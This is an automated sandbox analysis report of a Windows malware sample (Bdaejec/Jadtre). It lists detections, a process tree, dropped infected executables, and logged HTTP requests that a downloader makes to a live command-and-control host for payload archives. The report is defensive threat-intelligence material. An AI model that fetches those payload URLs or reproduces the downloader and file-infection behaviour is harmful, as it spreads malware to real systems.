Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1hdqYXYJkr.exe

Overview

General Information

Sample name:1hdqYXYJkr.exe
renamed because original name is a hash value
Original sample name:08d1bb65d58c5974d0192a4d843499305f6aecc7bc671349fc52abf931116be5.exe
Analysis ID:1488690
MD5:ac5a278467c279e653f34a552dd7170c
SHA1:1a13f3fb4b8c19478204e19126dbd8d2f81cfdbe
SHA256:08d1bb65d58c5974d0192a4d843499305f6aecc7bc671349fc52abf931116be5
Tags:exe
Infos:

Detection

Bdaejec
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
AI detected suspicious sample
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • 1hdqYXYJkr.exe (PID: 7044 cmdline: "C:\Users\user\Desktop\1hdqYXYJkr.exe" MD5: AC5A278467C279E653F34A552DD7170C)
    • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • oQmD.exe (PID: 6316 cmdline: C:\Users\user\AppData\Local\Temp\oQmD.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 3604 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6316 -s 1412 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4916 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 312 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: oQmD.exe PID: 6316JoeSecurity_BdaejecYara detected BdaejecJoe Security
    No Sigma rule has matched
    Timestamp:2024-08-06T12:33:52.850053+0200
    SID:2838522
    Source Port:65342
    Destination Port:53
    Protocol:UDP
    Classtype:Malware Command and Control Activity Detected
    Timestamp:2024-08-06T12:33:53.346605+0200
    SID:2807908
    Source Port:49730
    Destination Port:799
    Protocol:TCP
    Classtype:Malware Command and Control Activity Detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 1hdqYXYJkr.exeAvira: detected
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarURL Reputation: Label: malware
    Source: http://ddos.dnsnb8.net/URL Reputation: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarationAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k1.rartSAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k2.rar$=Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarf=QAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k2.raroAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k2.rartAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarIAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net/-window-ext-l1-1-0.dllAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rariAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net/amDataAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarAppDataAvira URL Cloud: Label: phishing
    Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: ddos.dnsnb8.netVirustotal: Detection: 12%Perma Link
    Source: http://ddos.dnsnb8.net:799/cj//k1.rartSVirustotal: Detection: 15%Perma Link
    Source: http://ddos.dnsnb8.net:799/cj//k2.raroVirustotal: Detection: 15%Perma Link
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarationVirustotal: Detection: 15%Perma Link
    Source: http://ddos.dnsnb8.net:799/cj//k2.rartVirustotal: Detection: 10%Perma Link
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarIVirustotal: Detection: 9%Perma Link
    Source: http://ddos.dnsnb8.net/-window-ext-l1-1-0.dllVirustotal: Detection: 14%Perma Link
    Source: http://ddos.dnsnb8.net:799/cj//k1.rariVirustotal: Detection: 11%Perma Link
    Source: http://ddos.dnsnb8.net/amDataVirustotal: Detection: 8%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeReversingLabs: Detection: 95%
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeVirustotal: Detection: 93%Perma Link
    Source: 1hdqYXYJkr.exeVirustotal: Detection: 85%Perma Link
    Source: 1hdqYXYJkr.exeReversingLabs: Detection: 94%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
    Source: 1hdqYXYJkr.exeJoe Sandbox ML: detected
    Source: 1hdqYXYJkr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 1hdqYXYJkr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

    Spreading

    barindex
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_009685E9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_009685E9
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_008029E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_008029E2
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_00802B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00802B8C
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

    Networking

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799
    Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_00801099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,2_2_00801099
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
    Source: oQmD.exe, 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmp, oQmD.exe, 00000002.00000003.1632073114.0000000000AF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
    Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.000000000063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
    Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/-window-ext-l1-1-0.dll
    Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/amData
    Source: oQmD.exe, 00000002.00000003.1638844737.0000000000698000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000003.1638844737.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.0000000000673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
    Source: oQmD.exe, 00000002.00000002.1843788615.000000000063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rari
    Source: oQmD.exe, 00000002.00000003.1638844737.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rartS
    Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1844225317.00000000023FA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
    Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar$=
    Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarAppData
    Source: oQmD.exe, 00000002.00000002.1844225317.00000000023FA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarI
    Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.raration
    Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarf=Q
    Source: oQmD.exe, 00000002.00000002.1843788615.00000000006DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.raro
    Source: oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rart
    Source: Amcache.hve.2.drString found in binary or memory: http://upx.sf.net
    Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.comHolger
    Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.comBrendon
    Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.comDeepak
    Source: SciTE.exe.2.drString found in binary or memory: http://www.lua.org
    Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.comJosiah
    Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org
    Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org/scite.rng
    Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.comMathias
    Source: oQmD.exe, 00000002.00000003.1638844737.0000000000698000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c
    Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/
    Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/Morten
    Source: SciTE.exe.2.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_f40c947f-a

    System Summary

    barindex
    Source: 1hdqYXYJkr.exeStatic PE information: section name: k)u
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
    Source: oQmD.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_00A02B710_2_00A02B71
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_009677CA0_2_009677CA
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_008060762_2_00806076
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_00806D002_2_00806D00
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\oQmD.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: String function: 00958FD0 appears 49 times
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 312
    Source: MyProg.exe.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
    Source: 1hdqYXYJkr.exe, 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOzufubat.exe" vs 1hdqYXYJkr.exe
    Source: 1hdqYXYJkr.exe, 00000000.00000000.1630493730.000000000097B000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOzufubat.exe" vs 1hdqYXYJkr.exe
    Source: 1hdqYXYJkr.exeBinary or memory string: OriginalFilenameOzufubat.exe" vs 1hdqYXYJkr.exe
    Source: 1hdqYXYJkr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: oQmD.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: oQmD.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: oQmD.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
    Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@7/15@1/1
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_0080119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,2_2_0080119F
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rarJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7044
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6316
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeFile created: C:\Users\user\AppData\Local\Temp\oQmD.exeJump to behavior
    Source: 1hdqYXYJkr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.91%
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 1hdqYXYJkr.exeVirustotal: Detection: 85%
    Source: 1hdqYXYJkr.exeReversingLabs: Detection: 94%
    Source: unknownProcess created: C:\Users\user\Desktop\1hdqYXYJkr.exe "C:\Users\user\Desktop\1hdqYXYJkr.exe"
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeProcess created: C:\Users\user\AppData\Local\Temp\oQmD.exe C:\Users\user\AppData\Local\Temp\oQmD.exe
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 312
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6316 -s 1412
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeProcess created: C:\Users\user\AppData\Local\Temp\oQmD.exe C:\Users\user\AppData\Local\Temp\oQmD.exeJump to behavior
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: 1hdqYXYJkr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: 1hdqYXYJkr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeUnpacked PE file: 2.2.oQmD.exe.800000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: k)u
    Source: 1hdqYXYJkr.exeStatic PE information: section name: k)u
    Source: oQmD.exe.0.drStatic PE information: section name: .aspack
    Source: oQmD.exe.0.drStatic PE information: section name: .adata
    Source: SciTE.exe.2.drStatic PE information: section name: u
    Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ
    Source: MyProg.exe.2.drStatic PE information: section name: PELIB
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_00A01E85 push 00000000h; ret 0_2_00A02296
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_00A01E7B push ebp; ret 0_2_00A01E7E
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_0095879F push ecx; ret 0_2_009587B2
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_00801638 push dword ptr [00803084h]; ret 2_2_0080170E
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_0080600A push ebp; ret 2_2_0080600D
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_00806014 push 008014E1h; ret 2_2_00806425
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_00802D9B push ecx; ret 2_2_00802DAB
    Source: oQmD.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
    Source: SciTE.exe.2.drStatic PE information: section name: u entropy: 6.934227743946339
    Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ entropy: 6.933439370372331
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR entropy: 6.934671817706898

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeFile created: C:\Users\user\AppData\Local\Temp\oQmD.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
